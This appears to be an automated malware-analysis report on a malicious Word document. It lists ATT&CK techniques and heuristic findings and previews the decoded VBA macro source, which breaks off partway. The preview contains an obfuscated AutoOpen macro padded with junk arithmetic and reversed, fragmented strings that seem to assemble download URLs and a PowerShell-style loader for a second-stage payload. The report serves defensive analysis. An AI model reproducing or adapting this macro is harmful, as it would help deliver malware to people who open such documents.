MALICIOUS
142
Risk Score
Malware Insights
MITRE ATT&CK
T1059.005 Visual Basic
T1566.001 Spearphishing Attachment
T1059 Command and Scripting Interpreter
The sample contains a critical heuristic firing for a Shell() call within VBA macros, indicating the execution of arbitrary code. The presence of an AutoOpen macro further suggests that this malicious code is designed to run automatically upon opening the document. The likely intent is to download and execute a second-stage payload, which is a common technique for malware delivery.
Heuristics 5
-
VBA macros detected medium 2 related findings OLE_VBA_MACROSDocument contains VBA macro code
-
Shell() call in VBA critical OLE_VBA_SHELLShell() call in VBA
-
AutoOpen macro high OLE_VBA_AUTOOPENAutoOpen macro
-
Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXECOLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
-
Embedded URL info EMBEDDED_URLOne or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)
Extracted artifacts 1
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
macros.bas |
vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 152760 bytes |
SHA-256: f94fde4c32520d41a32ad25301163518631d34817506015adc6893195fe18995 |
|||
Preview scriptFirst 1,000 lines of the extracted script
Attribute VB_Name = "zTCMCLsEMm"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Sub aifnRX(kSzKz)
jMPIT = GMwOdb
uVvuH = buGvHd + CDbl(29929 - dPmzE - ALkVFJ + CDbl(45973)) - 38925 - CDbl(30358)
PCMOdz = XrPXPZ
HiDId = 92680
End Sub
Sub RZwBi(ZowWHi)
jFRAqj = OGoHll
ObFPr = QwcPN + CDbl(90592 - PissP - vkBMCS + CDbl(94235)) - 41972 - CDbl(96046)
kpQzR = NsHQL
hcBnu = 38989
fNwrA = jMOCzu
Snsawz = EVzlzZ + CDbl(66352 - YLPXc - SzowP + CDbl(14407)) - 64700 - CDbl(98469)
qJWNuu = bqwZGJ
KsbHh = 76446
maRmz = EbhqME
JccLn = ojZaC + CDbl(9116 - jdGoA - LwDiF + CDbl(51779)) - 89747 - CDbl(9729)
zIGNBn = iPPTa
TNAOhq = 12323
End Sub
Sub VsqMtZ(tXktC)
kQTpD = iurYh
Mcqhq = DwEdQQ + CDbl(461 - Ozori - XqjwhY + CDbl(59055)) - 41959 - CDbl(53727)
iTJmhw = MhrpD
GADpu = 13497
GzuHCW = tASOhW
zwHNb = jcKmk + CDbl(38513 - cwdijO - aiZCkK + CDbl(6356)) - 43222 - CDbl(21786)
dHhjH = vcTpw
pIWikR = 94140
End Sub
Sub Autoopen()
On Error Resume Next
jiTaz = WFcQN
RvJcn = VrhGQ + CDbl(47973 - woRfC - mZofwo + CDbl(13075)) - 66592 - CDbl(75108)
qzDcjM = wtvfvF
cOuZAf = 10269
PnGYscEinpZ (Zqbnc + ZXJwwolIK + KojWi)
qGNwQ = uSmHuq
zCkuj = HcRZMA + CDbl(92401 - foFOIN - wVAzIQ + CDbl(71805)) - 74753 - CDbl(75848)
wlSdM = uzoah
hAwUB = 27985
End Sub
Sub hslcZA(jzXRWp)
HQPdFT = KPUnN
ozAnO = JGZKI + CDbl(87404 - fpzbXE - vZkhrw + CDbl(91100)) - 28305 - CDbl(42411)
RpMcrk = kDzjXh
HjcnZ = 26859
ziVcPP = wSbuk
tShBnF = rTELY + CDbl(84883 - aIUHpI - UGqzcU + CDbl(55602)) - 76527 - CDbl(71339)
mnkMo = bAUNw
iJEXkt = 77276
TFcHYL = BKkXDi
ZlHRlF = HVurqc + CDbl(64033 - FjjznE - KcncLZ + CDbl(79980)) - 67844 - CDbl(80184)
uzkTPT = iEMkh
hiJHE = 2044
End Sub
Sub Dvcsai(ItURlF)
wfzbpQ = RirwdM
uCSki = pwVrs + CDbl(72220 - zokuwc - lDMfP + CDbl(69818)) - 23723 - CDbl(74654)
kvzRY = rBhDD
zKFjE = 53728
End Sub
Attribute VB_Name = "czzwAvUqqmV"
Sub pClkwv(QkziN)
ZIntGw = IjKPn
wWEYAP = FOGLZ + CDbl(17461 - kLsiOj - bmjzj + CDbl(81296)) - 20647 - CDbl(79899)
sWzzw = MMzTBp
CcTzI = 51261
End Sub
Function ZXJwwolIK()
On Error Resume Next
rfADtV = XaQZAQ
NpcJp = zjhviO + CDbl(32100 - Eimhks - MWtGd + CDbl(27924)) - 77077 - CDbl(72329)
uAZCom = nSozKw
ViEzT = 93102
oziKn = kAFiiR
jGTsq = ZuKaXt + CDbl(51882 - wcjZb - OrBfw + CDbl(79673)) - 75339 - CDbl(44440)
vTDsXD = PShSG
iYGQM = 66326
Nwjtq = VrwsC("jR,pjl+Y1l/60Z0Y1l+Y1ldy4o/tY1l+Y1lneilY1l+Y1lc_te'+'nY1l+Y1lpsa/mY1l+Y1l'+'oc.odafaz//:pY1l+'+'Y1lt'+'th@Y1l+Y1l/gY1l+Y1l43lHC/Y1l+Y1lmoc", 55176 + 2 - 55176, 55176 + 132 - 55176)
XYIDJr = EotBpC
PGUBD = jNNrI + CDbl(2909 - NcYicE - JWLzjf + CDbl(26200)) - 21335 - CDbl(52197)
fcDGP = mPIVH
LQuHz = 54669
VjMqb = pqQZGS
WCqswo = DGuIw + CDbl(95081 - zbwWCb - WVpBd + CDbl(89308)) - 23404 - CDbl(48401)
RHUtC = wUpmU
OoDrd = 77531
Wrhpzhrzzj = VrwsC("Ou0Dl+Y1lifQY1l+Y1llnWiY1l+Y1lfY1l+Y1lQoDyY1l+Y1lpF.UYYxFe{yY1l+Y1lrtY1l+Y1l{)XCDAxFe'+' ni cfsaxFY1l+Y'+'1le(hcaY1'+'l+Y1lerY1l+Y143HE", 53680 + 5 - 53680, 53680 + 127 - 53680)
OTDEqV = jBrSu
ihdBi = wzicj + CDbl(30237 - vIjlJ - GWKFN + CDbl(5269)) - 56564 - CDbl(46430)
WvdXs = lhLBM
rskrW = 77977
EESVs = YhljR
ZWdwG = ssAKMi + CDbl(36746 - tYREN - NznJw + CDbl(35465)) - 45203 - CDbl(93602)
zzLHt = qvoBw
LCuroC = 38952
FGhZtNc = VrwsC("NY//:ptYOptQT", 67926 + 6 - 67926, 67926 + 6 - 67926)
AQhSGz = iTwnKv
DKAXZD = cdCOT + CDbl(3908 - tRKQDV - hRsBu + CDbl(86135)) - 17021 - CDbl(53156)
NowZzj = RcQZXm
EnzjoC = 76918
zpjPLv = Jzbarz
FLquA = PnOHHu + CDbl(23905 - lPkSIk - uoPmfI + CDbl(19811)) - 18830 - CDbl(14803)
hifvi = pSmbJ
ZHRjJY = 65870
wvRmv = VrwsC("tRdAlW+ktWenktW(Y1l+Y'+'1l. = UYYxFe;modnar )ktWtkY1l+Y1ltW+ktWceY1l+Y1ljbo-wktWY1l+j@", 45514 + 3 - 45514, 45514 + 80 - 45514)
IjMJKW = IUaFiG
aQhtCE = zVJnTP + CDbl(16053 - wwmbR - zRVkL + CDbl(69055)) - 64454 - CDbl(96315)
WfUqh = CQVdv
NDWqH = 35061
AWSDa =
... (truncated)
|
|||
Open this report in the interactive analyzer, or submit your own file for analysis.